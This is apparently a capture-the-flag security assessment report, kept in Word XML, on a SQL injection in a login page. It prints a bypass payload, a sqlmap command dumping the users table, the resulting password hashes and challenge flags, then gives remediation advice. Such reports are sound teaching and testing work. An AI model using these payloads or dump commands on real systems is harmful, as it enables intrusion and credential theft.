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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4591050" cy="4591050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Imagen 2" descr="Nuw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Nuwe - YouTub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Title"/>
        <w:ind w:left="2124" w:firstLine="708"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Demo Company</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Assessment Findings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PageVersion"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Date: November 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 2022</w:t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0" w:name="_Toc119432373"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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71"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1871" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208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pacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/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000" w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="2969"/>
        <w:gridCol w:w="4951"/>
      </w:tblGrid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Name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Title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Contact Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"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 xml:space="preserve">NUWE x Schneider Electric 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rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>daniello.alfonso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>Participant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 xml:space="preserve">Email: </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>daniello.alfonso@gmail.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Github: https://github.com/Virgo83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0n3pr0t0n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>Participant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 xml:space="preserve">Email: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0n3pr0t0n@proton.me</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Github: </w:t>
            </w:r>
            <w:hyperlink r:id="rId3" w:tgtFrame="_blank">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                </w:rPr>
                <w:t>https://github.com/DamBasement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1" w:name="_Toc119432374"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finding Severity Ratings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defines levels of severity and corresponding CVSS score range that are used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10074" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-7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83"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="6571"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:trHeight w:val="170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Severity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CVSS V3 Score Range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Definition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Critical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9.0-10.0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Exploitation is straightforward and usually results in system-level compromise.  It is advised to form a plan of action and patch immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="69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High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7.0-8.9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Moderate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4.0-6.9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>
        <w:trPr>
          <w:trHeight w:val="548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Low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0.1-3.9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BodyBlockLabelnonTOC"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Informational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N/A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2" w:name="_Toc119432375"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9569" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-538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000" w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4028"/>
        <w:gridCol w:w="5540"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="406" w:hRule="atLeast"/>
          <w:cantSplit w:val="true"/>
        </w:trPr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Assessment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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="744" w:hRule="atLeast"/>
          <w:cantSplit w:val="true"/>
        </w:trPr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Security Audit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18.130.53.47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entury Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc119432376"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Security Audit Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc119432377"/>
      <w:bookmarkStart w:id="5" w:name="_Toc9866482"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Vulnerability Name – Location (Severity)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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9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Description: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Basic SQL Injection vulnerability available into the login.php file. It allows user to inject a malicious SQL query to bypass user validation.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Impact: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System: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http://internal.vese.com/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="413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References: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https://www.inforge.net/forum/threads/bypassare-addslashes-usando-delle-format-string-e-ottenere-una-sql-injection.606602/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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Despite the use of addslashes(), We are able to log in successfully without knowing a valid username or password. I can simply exploit the SQL injection vulnerability. Providing the following values as user and pass it will grant me the access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0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username = %1$') UNION select * FROM users.users; -- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0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pwd = any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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>In the current situation the limit imposed by the addslashes function prevents us from escaping from the query and executing a sql injection, however there is still a function that is known to be vulnerable in other languages</w:t>
      </w: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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"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 xml:space="preserve">like C and C++ and that perhaps can help us break the restrictions. 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Looking carefully at the source code however it is possible to notice that we can control the format argument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through the pass parameter because the symbols used to define conversion specification strings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(% and $) are not sanitized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by the addslashes function (which considers only ' " and \).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/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Using sqlmap we are also able to enumerate DB users and hased password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr/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python3 sqlmap.py -u "http://internal.vese.com/login.php" --forms --crawl=2 -D users -T users -C username,password –dump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username        | password                        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eladministrador | 0db613e31e5b53a238e35469d752ffa6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dstewart        | 6f299895ed844bd22404cfd69b3b6e2c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decryptme       | ee234f62b7578420925a2307b51c64b3ca153ad7336d8636f7ac3e1a8888e6c2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nsanders        | ef91307aae4da64fa55b90ae1fc1f3c5 (helloitsme)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bgenbu          | ffd9ab7908160075448185d7620ecd38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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr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Remediation</w:t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8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Who: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DEV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Team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Vector: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Action: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To avoid this type of vulnerability, use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274466"/>
                <w:spacing w:val="0"/>
                <w:shd w:fill="EFF7FF" w:val="clear"/>
              </w:rPr>
              <w:t>mysql_real_escape_string()</w:t>
            </w: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, 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instrText> HYPERLINK "http://www.zend.com/php5/articles/php5-mysqli.php" \l "Heading11"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fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/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spacing w:val="0"/>
                <w:sz w:val="26"/>
                <w:u w:val="none"/>
                <w:effect w:val="none"/>
                <w:bdr w:val="single" w:sz="2" w:space="1" w:color="0077DD"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t>prepared statements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fldChar w:fldCharType="end"/>
            </w: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, or any of the major database abstraction libraries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b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/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9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Description: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Impact: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Critical, High, Moderate, Low, Informational…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System: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413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References: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  <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/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Exploitation Proof of Concept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Remediation</w:t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8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Who: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IT Team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Vector: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Remote, Physical…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Action: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Item 1:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="true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Item 2:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="true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keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Item 3:</w:t>
            </w:r>
          </w:p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keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Item 4:</w:t>
            </w:r>
          </w:p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keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Additional Recommendations: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>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc119432378"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Exploitation Paths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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  <w:t>{FLAG_PSEUTERM_COIN_256579}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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  <w:t>{FLAG_INTWEBSI_IHAL_421571}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160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Calibri Light">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Franklin Gothic Book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Roboto">
    <w:altName w:val="apple-system"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Mallory">
    <w:altName w:val="Verdana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d0b0f"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US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d0b0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qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="5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d0b0f"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00bd0b0f"/>
    <w:rPr>
      <w:color w:val="0563C1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bd0b0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1064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ar"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TitlePageVersion" w:customStyle="1">
    <w:name w:val="Title Page - Version"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24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d0b0f"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="right" w:pos="10070" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:szCs w:val="20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bd0b0f"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="right" w:pos="10070" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="60"/>
      <w:ind w:left="403" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:szCs w:val="20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bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="100"/>
      <w:ind w:left="200" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Spacer" w:customStyle="1">
    <w:name w:val="*Spacer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="12"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyBlockLabelnonTOC" w:customStyle="1">
    <w:name w:val="*Body Block Label (non TOC)"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableTextSmall" w:customStyle="1">
    <w:name w:val="Table Text - Small"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableHeaderText" w:customStyle="1">
    <w:name w:val="Table - Header Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyBlockLine" w:customStyle="1">
    <w:name w:val="*Body Block Line"/>
    <w:basedOn w:val="Spacer"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="120"/>
      <w:ind w:left="1620" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="auto"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Finding" w:customStyle="1">
    <w:name w:val="*Finding"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FindingTableLabel" w:customStyle="1">
    <w:name w:val="*Finding Table Label"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:right="-170" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableText" w:customStyle="1">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="MS Mincho" w:cs="Times New Roman"/>
      <w:sz w:val="24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DamBasemen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LibreOffice/7.0.4.2$Linux_X86_64 LibreOffice_project/00$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>7</Pages>
  <Words>531</Words>
  <Characters>3621</Characters>
  <CharactersWithSpaces>4263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2022-11-15T17:57:00Z</dcterms:created>
  <dc:creator>Jose RF</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2022-11-15T18:14:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-19T21:21:58Z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